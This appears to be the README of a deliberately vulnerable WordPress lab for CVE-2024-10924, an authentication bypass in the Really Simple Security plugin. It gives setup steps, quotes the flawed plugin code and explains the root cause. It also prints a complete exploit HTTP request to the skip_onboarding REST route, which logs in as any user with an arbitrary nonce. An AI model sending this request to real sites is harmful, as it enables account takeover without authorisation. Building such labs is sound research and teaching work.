This is a vulnerable application to test the exploit for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924).
This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.
DISCLAIMER: I do not take responsibility for the way in which any one uses this application. The only purpose of this application is to be a test scenario for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924) exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.
- CVE-ID: CVE-2024-10924
- Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
- Description: This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
- Fix: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
- Wordfence bulletin: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
Here the steps to setup the environment:
- Launch
./up.shto start composition. - Complete the installation of WordPress here: https://localhost:1337/wp-admin/install.php.
- Login into WordPress.
- Go to "Plugins": https://localhost:1337/wp-admin/plugins.php.
- Click on "Activate" under the "Really Simple Security" plugin. DO NOT UPDATE IT, since we need the vulnerable version.
- Click on "Cancel" on the popup referring to SSL activation.
- Go to "Settings" > "Login Protection" > "Two-Factor Authentication" and, in the "Two-Factor Authentication" section, enable "Enable Two-Factor Authentication".
- Click the "Save" button.
The container will be called vuln-wp-really-simple-security.
To teardown the environment use ./down.sh command or ./down_and_delete.sh command to also remove images and the volume of the database.
Having a look at the fix, it's possible to understand that in the vulnerable version an error object was returned, in case of invalid login nonce, by the check_login_and_get_user() function, without aborting the whole operation.
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
}
/**
* Get the user by the user ID.
*
* @var WP_User $user
*/
$user = get_user_by( 'id', $user_id );
return $user;
}In the caller, by the way, no check was performed on the output of the check_login_and_get_user() function (line 277), but simply going further with the authenticate_and_redirect() function (line 278) using the same value received from input for the user ID.
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
$parameters = new Rsssl_Request_Parameters( $request );
// As a double we check the user_id with the login nonce.
$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}To exploit the vulnerability, a request like the following is sufficient.
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}Then setting accordingly the returned session cookies in the browser.
The user_id must be the ID of the target user, the login_nonce can be anything since a wrong value won't block the process.
An exploit script in Python can be found here.
- Antonio Francesco Sardella - implementation - m3ssap0
This project is licensed under the Unlicense - see the LICENSE file for details.
- István Márton, the security researcher who discovered the vulnerability.